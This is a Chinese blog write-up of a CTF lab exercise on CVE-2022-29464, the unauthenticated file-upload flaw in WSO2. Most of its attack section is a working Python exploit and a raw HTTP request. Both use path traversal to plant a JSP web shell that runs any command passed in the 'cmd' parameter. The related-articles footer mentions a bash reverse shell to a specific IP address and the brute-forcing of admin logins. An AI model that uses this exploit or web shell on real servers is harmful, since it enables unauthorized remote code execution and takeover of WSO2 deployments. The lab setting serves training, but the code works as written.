首页 > 其他分享 >春秋云镜CVE-2022-29464 (WSO2文件上传漏洞)

春秋云镜CVE-2022-29464 (WSO2文件上传漏洞)

时间:2024-09-02 09:05:55浏览次数:10  
标签:shell 29464 .. authenticationendpoint webapps 云镜 WSO2 deployment 上传

目录

一:访问靶机:

2:根据提示知道可以文件上传

3:两个方法

一:访问靶机:

2:根据提示知道可以文件上传

3:我们两个方法
1:使用EXP
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = input("请输入URL:")
file = "shell.jsp"
payload = """



<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %>
<%=output %>
"""

files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")

直接访问。拿到flag

2:使用burp抓包修改参数

poc
POST /fileupload/toolsAny HTTP/1.1
Host: eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9443
Accept: /
Accept-Encoding: gzip, deflate
Content-Length: 901
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0-- ![](/i/l/?n=24&i=blog/3511389/202409/3511389-20240902085822368-330486759.png)



标签:shell,29464,..,authenticationendpoint,webapps,云镜,WSO2,deployment,上传
From: https://www.cnblogs.com/Crushz-2024/p/18392108

相关文章

  • 春秋云镜CVE-2022-28525(ED01-CMS v20180505 存在任意文件上传漏洞)
    1:访问靶机发现是登录界面2:尝试使用弱口令爆破(明文传输)3:添加pyload并选择攻击类型字典我们随便选择的,实际情况需要实际定义爆破成功,用户名:admin密码:admin登录成功4:找到如图模块,上传图片马上传成功(上传时需要抓包改上传类型)5:使用蚁剑连接,拿到flag......
  • 春秋云镜 Flarum
    访问发现是个FlarumCMS框架.使用rockyou.txt爆破administrator得到密码1chris,登录后台由于题目提示Flarum上执行任意命令,搜到了P牛的文章照着打反序列化.执行命令./phpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/123.57.23.40/11110>&1'"生成t......
  • 春秋云镜 网鼎杯2022半决赛
    现用fscan扫一下访问发现是个wordpress,wpscan一下版本为6.2.6,使用了twentytwentyonetheme后台弱密码admin/123456登录由于存在themefileeditor,因此可以写马随便找一个php文件,写入木马.使用蚁剑连接,路径之前wpscan给出来了.得到了第一个flagflag:flag{c0af2d0......
  • 春秋云镜 Delegation
    现用fscan扫一下入口机发现是cmseasy,在/admin路由处可以登录,弱密码admin123456这里存在CVE漏洞,写个马进去get:/index.php?case=template&act=save&admin_dir=admin&site=defaultpost:sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php@eval($_POST[1]);?>......
  • 【内网渗透】最保姆级的春秋云镜initial打靶笔记
    目录flag1flag2flag3 flag1外网thinkphp服务 随便找个工具梭连蚁剑读/root目录要提权suid没有可利用的提权命令,打sudo提权sudo-lmysql的sudo提权 Linux提权之Sudo70种提权方法-简单安全 查看文件名带flag的文件sudomysql-e'\!find/-typef-n......
  • 春秋云镜 Brute4Road
    先用fscan扫一下内网尝试打redis主从python3redis-rogue-server.py--rhost39.98.122.75--lhost123.57.23.40需要在vps下使用,选择r,然后输入要反弹的ip,port使用pty获得交互式shellpython-c'importpty;pty.spawn("/bin/bash")'尝试UID提权find/-userroot-......
  • 春秋云镜 time
    先用fscan扫一下,得到了下面的端口挨个尝试,访问7473发现是个neo4j的服务.这个neo4j的server只出现过这一个历史漏洞我们在网上下载jar漏洞利用文件,然后在本地运行.注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误运行命令java-jar.\rhino_gadget......
  • 春秋云镜 tsclient
    入口机给了个ip首先用fscan扫一下看看发现存在mysql远程登录,弱口令都扫出来了.使用MDUT进行远程登录登录以后上传cs马,选(s)这个.注意要上传到C:/Users/Public/,因为public文件夹通常有写的权限然后执行命令C:/Users/Public/beacon.exe回到cs中成功得到shell调整休眠时......
  • 春秋云镜CVE-2023-38836
    打开靶场环境点击发现一个登陆框,弱口令试一下发现账号密码为admin,password随便点击点击Media发现这里可以上传文件上传木马试试<?php@eval($_POST["wjq"]);?>发现不能上传php文件php内容修改他的格式抓包绕过一下302就可以其实已经写进去了点一下4......
  • 春秋云境 | 文件上传 | CVE-2022-29464
    靶标介绍WSO2文件上传漏洞(CVE-2022-29464)是OrangeTsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。开启靶场先到国家信息安全漏洞库查看一下这个漏洞的相关信息利用......